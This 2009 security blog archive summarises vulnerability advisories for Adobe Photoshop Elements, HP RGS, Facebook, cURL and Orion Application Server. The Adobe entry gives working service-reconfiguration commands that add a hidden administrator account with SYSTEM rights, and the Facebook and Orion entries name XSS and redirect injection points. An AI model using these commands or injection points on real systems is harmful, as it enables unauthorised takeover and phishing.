Archive for September, 2009

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges

Wednesday, September 30th, 2009

Adobe Photoshop Elements 8.0 suffers from a vulnerability discovered by Nine Situations Group, the vulnerability research group founded by the Italian programmer and hacker retrogod, R.I.P.

The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user in the Users group (which on XP means a "limited account") can stop the service, invoke the "sc config" command to replace the binary path with a value of their choice, and then restart the service to run that command with SYSTEM privileges. For example, run these commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

Log in as administrator with the password "kills".

HP Remote Graphics Software (RGS) Sender, Remote Unauthorized Access

Tuesday, September 29th, 2009

Hewlett-Packard Development Company, L.P.

A potential security vulnerability has been identified with HP Remote Graphics Software (RGS) Sender. The vulnerability could be exploited remotely to gain unauthorized access.

Impact
Remote unauthorized access

Patch
HP provides a software update here

Facebook XSS URL String Evasion

Tuesday, September 29th, 2009

Facebook Social Network XSS URL String Evasion – Facebook suffers from an XSS URL evasion.

Example

http://apps.facebook.com/quizzname/?next=[]

Proof of Concept

http://apps.facebook.com/quelendroitltwgzmv/?next=link

http://apps.facebook.com/queldictateursommeil/?next=xss

You can also use this vulnerability to redirect the victim to a phishing page:

http://apps.facebook.com/quizzname/?next=link

We all love Facebook :-(

Gentoo Certificate validation error Vulnerability

Sunday, September 27th, 2009

An error in the X.509 certificate handling of cURL might enable remote attackers to conduct man-in-the-middle attacks. cURL, a command line tool for transferring files with URL syntax that supports numerous protocols, does not properly handle fields in X.509 certificates that contain an ASCII NUL (\0) character. Specifically, the processing of such fields is stopped at the first occurrence of a NUL character. This type of vulnerability was recently discovered by Dan Kaminsky and Moxie Marlinspike.
A remote attacker might employ a specially crafted X.509 certificate (that for instance contains a NUL character in the Common Name field) to conduct man-in-the-middle attacks.

emerge --sync
emerge --ask --oneshot --verbose =net-misc/curl-7.19.6
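
The truncation described in the cURL advisory above, as an added example (not code from cURL or from the advisory): a name check that handles the certificate field as a C string, next to one that uses the field's ASN.1 length and rejects embedded NULs. The struct, the function names and the sample names are assumptions made for illustration, and matching is exact only, with no wildcard or case handling.

```c
#include <stdio.h>
#include <string.h>

/* Certificate name field as decoded from ASN.1: explicit length, no
 * terminator, and the bytes may contain 0x00. (Hypothetical type.) */
struct asn1_name { const unsigned char *data; size_t len; };

/* Flawed: copies the field into a C string and compares with strcmp(),
 * so everything after the first NUL is silently ignored. */
int cn_matches_truncating(const struct asn1_name *cn, const char *host)
{
    char buf[256];
    size_t n = cn->len < sizeof(buf) - 1 ? cn->len : sizeof(buf) - 1;
    memcpy(buf, cn->data, n);
    buf[n] = '\0';
    return strcmp(buf, host) == 0;
}

/* Hardened: reject any embedded NUL, then compare using the ASN.1 length. */
int cn_matches_strict(const struct asn1_name *cn, const char *host)
{
    size_t host_len = strlen(host);
    if (memchr(cn->data, '\0', cn->len) != NULL)
        return 0;
    return cn->len == host_len && memcmp(cn->data, host, host_len) == 0;
}

/* Constructed sample names; sizeof - 1 drops only the literal's terminator. */
static const unsigned char CN_GOOD[] = "www.example.com";
static const unsigned char CN_NUL[]  = "www.example.com\0.attacker.invalid";
static const struct asn1_name good_cn = { CN_GOOD, sizeof(CN_GOOD) - 1 };
static const struct asn1_name nul_cn  = { CN_NUL,  sizeof(CN_NUL) - 1 };

int main(void)
{
    const char *host = "www.example.com";
    printf("clean CN:    truncating=%d strict=%d\n",
           cn_matches_truncating(&good_cn, host),
           cn_matches_strict(&good_cn, host));
    printf("NUL in CN:   truncating=%d strict=%d\n",
           cn_matches_truncating(&nul_cn, host),
           cn_matches_strict(&nul_cn, host));
    return 0;
}
```

The truncating check accepts both names for www.example.com, while the strict check accepts only the clean one.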

Orion Application Server XSS Vulnerability

Sunday, September 27th, 2009

A vulnerability in Orion Application Server (Java) allows an attacker to cause execution of malicious scripting code in the browser of a user who clicks on a link to an Orion Application Server site. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (e.g. session IDs) to unauthorised third parties.

/examples/jsp/sessions/carts.jsp?item=

/examples/jsp/checkbox/checkresult.jsp?fruit=

/examples/jsp/cal/cal2.jsp?time=